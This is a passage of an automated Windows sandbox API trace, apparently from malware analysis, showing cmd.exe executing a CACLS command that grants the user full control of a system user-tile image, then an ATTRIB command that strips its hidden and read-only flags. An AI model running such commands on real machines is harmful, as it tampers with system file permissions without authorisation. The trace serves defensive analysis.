lpSystemTimeAsFileTime=0x30fbfc | out: lpSystemTimeAsFileTime=0x30fbfc*(dwLowDateTime=0xa15e75c0, dwHighDateTime=0x1d440a9)) [0181.973] GetCurrentProcessId () returned 0xbf4 [0181.973] GetCurrentThreadId () returned 0xbec [0181.973] GetTickCount () returned 0x342c9 [0181.973] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbf4 | out: lpPerformanceCount=0x30fbf4*=23876256174) returned 1 [0181.974] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0181.974] __set_app_type (_Type=0x1) [0181.974] __p__fmode () returned 0x76b331f4 [0181.974] __p__commode () returned 0x76b331fc [0181.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0181.974] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0181.974] GetCurrentThreadId () returned 0xbec [0181.974] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 [0181.974] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.974] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0181.974] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.975] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0181.975] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb8c | out: phkResult=0x30fb8c*=0x0) returned 0x2 [0181.975] VirtualQuery (in: lpAddress=0x30fbc3, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0181.975] GetConsoleOutputCP () returned 0x1b5 [0181.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.975] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.976] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.976] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0181.976] GetEnvironmentStringsW () returned 0x400308* [0181.976] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.976] GetEnvironmentStringsW () returned 0x400308* [0181.976] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.976] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eafc | out: phkResult=0x30eafc*=0x40) returned 0x0 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0xb8, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x0, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegCloseKey (hKey=0x40) returned 0x0 [0181.977] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eafc | out: phkResult=0x30eafc*=0x40) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x0, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegCloseKey (hKey=0x40) returned 0x0 [0181.977] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0181.977] srand (_Seed=0x5b886390) [0181.977] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" [0181.977] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" [0181.977] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.977] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0181.978] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.978] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0181.978] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0181.978] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0181.978] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0181.978] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0181.978] GetEnvironmentStringsW () returned 0x402458* [0181.978] FreeEnvironmentStringsW (penv=0x402458) returned 1 [0181.978] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.978] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.978] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0181.978] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0181.978] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0181.978] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0181.978] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0181.978] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f8c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.978] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f8c8, lpFilePart=0x30f8c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f8c4*="Desktop") returned 0x18 [0181.978] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.979] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.979] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0181.979] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0181.979] GetEnvironmentStringsW () returned 0x400308* [0181.979] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.980] GetConsoleOutputCP () returned 0x1b5 [0181.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.980] GetUserDefaultLCID () returned 0x409 [0181.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa08, cchData=128 | out: lpLCData="0") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa08, cchData=128 | out: lpLCData="0") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa08, cchData=128 | out: lpLCData="1") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0181.981] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0181.982] GetConsoleTitleW (in: lpConsoleTitle=0x3f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.982] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0181.983] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0181.983] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0181.983] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0181.983] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0181.983] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0181.983] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0181.983] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0181.983] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0181.986] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0181.986] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0181.986] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0181.986] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0181.986] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0181.986] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0181.986] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0181.988] GetConsoleTitleW (in: lpConsoleTitle=0x30f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.988] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.988] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.988] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.988] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.988] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.988] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.988] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.988] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.988] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.988] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.989] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.989] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.989] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.989] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.989] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.989] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.989] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.989] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.989] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.989] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.989] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.990] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.990] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.990] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.990] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.990] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.990] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.990] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.990] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.990] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.990] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.990] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.990] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.990] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.990] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0181.990] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0181.990] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0181.990] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0181.991] SetErrorMode (uMode=0x0) returned 0x0 [0181.991] SetErrorMode (uMode=0x1) returned 0x0 [0181.991] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x401e98, lpFilePart=0x30f1bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f1bc*="Desktop") returned 0x18 [0181.991] SetErrorMode (uMode=0x0) returned 0x1 [0181.991] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.991] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.996] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.996] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x402180 [0181.997] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x402180 [0181.997] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0181.997] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.997] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.997] GetConsoleTitleW (in: lpConsoleTitle=0x30f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.998] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f380 | out: lpAttributeList=0x30f2b8, lpSize=0x30f380) returned 1 [0181.998] UpdateProcThreadAttribute (in: lpAttributeList=0x30f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f2b8, lpPreviousValue=0x0) returned 1 [0181.998] GetStartupInfoW (in: lpStartupInfo=0x30f274 | out: lpStartupInfo=0x30f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 